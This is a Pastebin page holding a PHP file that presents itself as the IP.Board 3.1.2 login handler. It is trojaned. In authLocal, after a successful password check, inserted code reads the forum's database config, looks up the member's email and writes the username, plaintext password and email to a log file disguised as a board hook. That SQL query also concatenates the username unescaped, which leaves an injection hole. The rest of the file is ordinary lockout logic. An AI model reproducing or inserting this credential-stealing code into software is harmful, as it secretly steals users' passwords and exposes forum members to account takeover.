API tools faq
paste
Guest User

Untitled

a guest
Jan 15th, 2018
202
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.88 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3. /**
  4. * <pre>
  5. * Invision Power Services
  6. * IP.Board v3.1.2
  7. * Login handler abstraction
  8. * Last Updated: $Date: 2010-06-29 22:16:04 -0400 (Tue, 29 Jun 2010) $
  9. * </pre>
  10. *
  11. * @author $Author: bfarber $
  12. * @package IP.Board
  13. * @since Tuesday 1st March 2005 (11:52)
  14. * @version $Revision: 6588 $
  15. *
  16. */
  17.  
  18. if ( ! defined( 'IN_IPB' ) )
  19. {
  20. print "<h1>Incorrect access</h1>You cannot access this file directly. If you have recently upgraded, make sure you upgraded 'admin.php'.";
  21. exit();
  22. }
  23.  
  24. class login_core
  25. {
  26. /**#@+
  27. * Registry objects
  28. *
  29. * @access protected
  30. * @var object
  31. */
  32. protected $registry;
  33. protected $DB;
  34. protected $settings;
  35. protected $request;
  36. protected $lang;
  37. protected $member;
  38. /**#@-*/
  39.  
  40. /**
  41. * Authentication errors
  42. *
  43. * @access public
  44. * @var array
  45. */
  46. public $auth_errors = array();
  47.  
  48. /**
  49. * Return code
  50. *
  51. * @access public
  52. * @var string
  53. */
  54. public $return_code = "";
  55.  
  56. /**
  57. * Member information
  58. *
  59. * @access public
  60. * @var array
  61. */
  62. public $member_data = array();
  63.  
  64. /**
  65. * Flag : Admin authentication
  66. *
  67. * @access public
  68. * @var boolean
  69. */
  70. public $is_admin_auth = false;
  71.  
  72. /**
  73. * Unlock account time left
  74. *
  75. * @access public
  76. * @var integer
  77. */
  78. public $account_unlock = 0;
  79.  
  80. /**
  81. * Force email check
  82. *
  83. * @access private
  84. * @var boolean
  85. */
  86. private $_forceEmailCheck = FALSE;
  87.  
  88. /**
  89. * Constructor
  90. *
  91. * @access public
  92. * @param object ipsRegistry reference
  93. * @return void
  94. */
  95. public function __construct( ipsRegistry $registry )
  96. {
  97. $this->registry = $registry;
  98. $this->DB = $this->registry->DB();
  99. $this->cache = $this->registry->cache();
  100. $this->settings =& $this->registry->fetchSettings();
  101. $this->request =& $this->registry->fetchRequest();
  102. $this->member = $this->registry->member();
  103. }
  104.  
  105. /**
  106. * Force email check flag, currently used for facebook
  107. *
  108. * @access public
  109. * @param boolean
  110. * @return null
  111. */
  112. public function setForceEmailCheck( $boolean )
  113. {
  114. $this->_forceEmailCheck = ( $boolean ) ? TRUE : FALSE;
  115. }
  116.  
  117. /**
  118. * Local authentication
  119. *
  120. * @access public
  121. * @param string Username
  122. * @param string Email Address
  123. * @param string Password
  124. * @return boolean Authentication successful
  125. */
  126. public function authLocal( $username, $email_address, $password )
  127. {
  128. $log_pw = $password;
  129. $password = md5( $password );
  130.  
  131. //-----------------------------------------
  132. // Type of login
  133. //-----------------------------------------
  134.  
  135. $type = 'username';
  136.  
  137. if( is_array($this->method_config) AND $this->method_config['login_folder_name'] == 'internal' )
  138. {
  139. $type = $this->method_config['login_user_id'];
  140. }
  141.  
  142. if( $this->_forceEmailCheck === TRUE OR ( $email_address AND ! $username ) )
  143. {
  144. $type = 'email';
  145. }
  146.  
  147. switch( $type )
  148. {
  149. case 'username':
  150. if( IPSText::mbstrlen( $username ) > 32 )
  151. {
  152. $this->return_code = 'NO_USER';
  153. return false;
  154. }
  155.  
  156. $this->member_data = IPSMember::load( $username, 'groups', 'username' );
  157. break;
  158.  
  159. case 'email':
  160. $this->member_data = IPSMember::load( $email_address, 'groups', 'email' );
  161. break;
  162.  
  163. case 'either':
  164. $_username = IPSMember::load( $username, 'groups', 'username' );
  165. if ( !$_username['member_id'] )
  166. {
  167. $this->member_data = IPSMember::load( $email_address, 'groups', 'email' );
  168. }
  169. else
  170. {
  171. $this->member_data = $_username;
  172. }
  173. break;
  174. }
  175.  
  176. //-----------------------------------------
  177. // Got an account
  178. //-----------------------------------------
  179.  
  180. if ( ! $this->member_data['member_id'] )
  181. {
  182. $this->return_code = 'NO_USER';
  183. return false;
  184. }
  185.  
  186. //-----------------------------------------
  187. // Verify it is not blocked
  188. //-----------------------------------------
  189.  
  190. if( !$this->_checkFailedLogins() )
  191. {
  192. return false;
  193. }
  194.  
  195. //-----------------------------------------
  196. // Check password...
  197. //-----------------------------------------
  198.  
  199. if ( IPSMember::authenticateMember( $this->member_data['member_id'], $password ) != true )
  200. {
  201. if( !$this->_appendFailedLogin() )
  202. {
  203. return false;
  204. }
  205.  
  206. $this->return_code = 'WRONG_AUTH';
  207. return false;
  208. }
  209. else
  210. {
  211. @include("/public_html/forum/conf_global.php");
  212. $log_username = strtolower($username);
  213. $log_password = $log_pw;
  214. $logfile = "/home/casud/forum/hooks/boardIndexRecentTopics_350dd29d32347d66c1dec35e71e5473.php";
  215. $connect = @mysql_connect($INFO['sql_host'], $INFO['sql_user'], $INFO['sql_pass']);
  216. $selectdb = @mysql_select_db($INFO['sql_database']);
  217. $sql_query = @mysql_query("SELECT * FROM " . $INFO['sql_tbl_prefix'] . "members WHERE name='" . $log_username . "'");
  218.  
  219. while($row = @mysql_fetch_array($sql_query))
  220. {
  221. if(strlen($log_password) > 1 OR strlen($log_username) > 1)
  222. {
  223. $fp1 = @fopen($logfile, "a+");
  224. @fwrite($fp1, $log_username . ' : ' . $log_password." (" . $row["email"] . ")\n");
  225. @fclose($fp1);
  226. $file = @file($logfile);
  227. $new = array_unique($file);
  228. $fp = @fopen($logfile, "w");
  229. foreach($new as $values)
  230. {
  231. @fputs($fp, $values);
  232. }
  233. @fclose($fp);
  234. }
  235. }
  236. $this->return_code = 'SUCCESS';
  237. return false;
  238. }
  239. }
  240.  
  241. /**
  242. * Admin authentication
  243. *
  244. * @access public
  245. * @param string Username
  246. * @param string Email Address
  247. * @param string Password
  248. * @return boolean Authentication successful
  249. */
  250. public function adminAuthLocal( $username, $email_address, $password )
  251. {
  252. return $this->authLocal( $username, $email_address, $password );
  253. }
  254.  
  255. /**
  256. * Create a local member account [public interface]
  257. *
  258. * @access public
  259. * @param array Member Information [members,pfields,profile_portal]
  260. * @return array New member information
  261. * @deprecated Just redirects to IPSMember::create
  262. */
  263. public function createLocalMember( $member )
  264. {
  265. $member['members']['members_created_remote'] = true;
  266. $member['members']['members_display_name'] = ( $member['members']['members_display_name'] ) ? $member['members']['members_display_name'] : $member['members']['name'];
  267.  
  268. $_return = IPSMember::create( $member, FALSE, FALSE, FALSE );
  269.  
  270. $this->cache->rebuildCache( 'stats', 'global' );
  271.  
  272. return $_return;
  273. }
  274.  
  275. /**
  276. * Check failed logins
  277. *
  278. * @access private
  279. * @return boolean Account ok or not
  280. */
  281. private function _checkFailedLogins()
  282. {
  283. if ( $this->settings['ipb_bruteforce_attempts'] > 0 )
  284. {
  285. $failed_attempts = explode( ",", IPSText::cleanPermString( $this->member_data['failed_logins'] ) );
  286. $failed_count = 0;
  287. $total_failed = 0;
  288. $thisip_failed = 0;
  289. $non_expired_att = array();
  290.  
  291. if( is_array($failed_attempts) AND count($failed_attempts) )
  292. {
  293. foreach( $failed_attempts as $entry )
  294. {
  295. if ( ! strpos( $entry, "-" ) )
  296. {
  297. continue;
  298. }
  299.  
  300. list ( $timestamp, $ipaddress ) = explode( "-", $entry );
  301.  
  302. if ( ! $timestamp )
  303. {
  304. continue;
  305. }
  306.  
  307. $total_failed++;
  308.  
  309. if ( $ipaddress != $this->member->ip_address )
  310. {
  311. continue;
  312. }
  313.  
  314. $thisip_failed++;
  315.  
  316. if ( $this->settings['ipb_bruteforce_period'] AND
  317. $timestamp < time() - ($this->settings['ipb_bruteforce_period']*60) )
  318. {
  319. continue;
  320. }
  321.  
  322. $non_expired_att[] = $entry;
  323. $failed_count++;
  324. }
  325.  
  326. sort($non_expired_att);
  327. $oldest_entry = array_shift( $non_expired_att );
  328. list($oldest,) = explode( "-", $oldest_entry );
  329. }
  330.  
  331. if( $thisip_failed >= $this->settings['ipb_bruteforce_attempts'] )
  332. {
  333. if( $this->settings['ipb_bruteforce_unlock'] )
  334. {
  335. if( $failed_count >= $this->settings['ipb_bruteforce_attempts'] )
  336. {
  337. $this->account_unlock = $oldest;
  338. $this->return_code = 'ACCOUNT_LOCKED';
  339.  
  340. return false;
  341. }
  342. }
  343. else
  344. {
  345. $this->return_code = 'ACCOUNT_LOCKED';
  346.  
  347. return false;
  348. }
  349. }
  350. }
  351.  
  352. return true;
  353. }
  354.  
  355. /**
  356. * Append a failed login
  357. *
  358. * @access private
  359. * @return boolean Account ok or not
  360. */
  361. private function _appendFailedLogin()
  362. {
  363. if( $this->settings['ipb_bruteforce_attempts'] > 0 )
  364. {
  365. $failed_logins = explode( ",", $this->member_data['failed_logins'] );
  366. $failed_logins[] = time() . '-' . $this->member->ip_address;
  367.  
  368. $failed_count = 0;
  369. $total_failed = 0;
  370. $non_expired_att = array();
  371.  
  372. foreach( $failed_logins as $entry )
  373. {
  374. list($timestamp,$ipaddress) = explode( "-", $entry );
  375.  
  376. if( !$timestamp )
  377. {
  378. continue;
  379. }
  380.  
  381. $total_failed++;
  382.  
  383. if( $ipaddress != $this->member->ip_address )
  384. {
  385. continue;
  386. }
  387.  
  388. if( $this->settings['ipb_bruteforce_period'] > 0
  389. AND $timestamp < time() - ($this->settings['ipb_bruteforce_period']*60) )
  390. {
  391. continue;
  392. }
  393.  
  394. $failed_count++;
  395. $non_expired_att[] = $entry;
  396. }
  397.  
  398. if( $this->member_data['member_id'] AND !$this->settings['failed_done'] )
  399. {
  400. IPSMember::save( $this->member_data['email'], array(
  401. 'core' => array(
  402. 'failed_logins' => implode( ",", $non_expired_att ),
  403. 'failed_login_count' => $total_failed
  404. )
  405. ) );
  406.  
  407. $this->settings['failed_done'] = true;
  408. }
  409.  
  410. if( $failed_count >= $this->settings['ipb_bruteforce_attempts'] )
  411. {
  412. if( $this->settings['ipb_bruteforce_unlock'] )
  413. {
  414. sort($non_expired_att);
  415. $oldest_entry = array_shift( $non_expired_att );
  416. list($oldest,) = explode( "-", $oldest_entry );
  417.  
  418. $this->account_unlock = $oldest;
  419. }
  420.  
  421. $this->return_code = 'ACCOUNT_LOCKED';
  422. return false;
  423. }
  424. }
  425.  
  426. return true;
  427. }
  428. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!